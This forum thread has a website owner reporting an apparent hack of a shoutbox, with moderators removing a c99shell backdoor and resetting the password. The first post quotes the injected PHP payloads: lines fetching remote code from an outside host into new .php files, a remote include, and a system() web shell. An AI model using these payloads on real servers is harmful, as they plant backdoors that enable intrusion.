possible hack?

Status
Not open for further replies.

vTech

New Member
Messages
34
Reaction score
0
Points
0
hey, i'm a lil worried...I have a shoutbox on my site http://asri-z.net/index.php
some anonymous poster made some post like
Code:
[COLOR="Red"]meeeee:[/COLOR] <?php $z=fopen("b.php",'w');fwrite($z,file_get_contents("http://faevs.com/z.txt"));fclose($z); ?>
[COLOR="Red"]lucs:[/COLOR] <?php $z=fopen("z.php",'w');fwrite($z,file_get_contents("http://faevs.com/z.txt"));fclose($z); ?>
[COLOR="Red"]sdf:[/COLOR] <?php include $_GET["include"]; ?>
[COLOR="Red"]sdf:[/COLOR] <?php system($_GET["cmd"]); ?>
[COLOR="Red"]Nameq:[/COLOR] <?php $z=fopen("a.php",'w');fwrite($z,file_get_contents("http://faevs.com/z.txt"));fclose($z); ?>

and i see a mysterious file on my shoutbox folder...
I've attached it,it's quite big....
what i'm worried is,when i checked the source of the file,i see something like
Code:
Owned by Spyn3t

please advice...dun want anything bad to happen....
thank you...
 
Last edited by a moderator:

sunils

New Member
Messages
2,266
Reaction score
0
Points
0
I have removed the attachement with the previous post as it contain a trojan horse backdoor.c99shell. i have reported this thread to the admin also. they will take care of the problem once they come online.
 

vTech

New Member
Messages
34
Reaction score
0
Points
0
one good way to catch this idiot would find anyone link to the site /************Link removed because its also a trojan **********/ cos that's where the source came from....
 
Last edited by a moderator:

Russ

<b>Retired *****</b>
Messages
3,168
Reaction score
2
Points
38
I have looked into this, and also checked your files to ensure that it didn't execute. I am going to change your password as a precaution, and email you a new one. It appears, however, your shoutbox was alittle more secure than to allow it to execute. Thank you for reporting this to us. Your password has been sent to 'asri.znet@yahoo.com'.
 

Corey

I Break Things
Staff member
Messages
34,553
Reaction score
204
Points
63
Remove the shoutbox, the script is insecure, it will happen again.
 
Status
Not open for further replies.
Top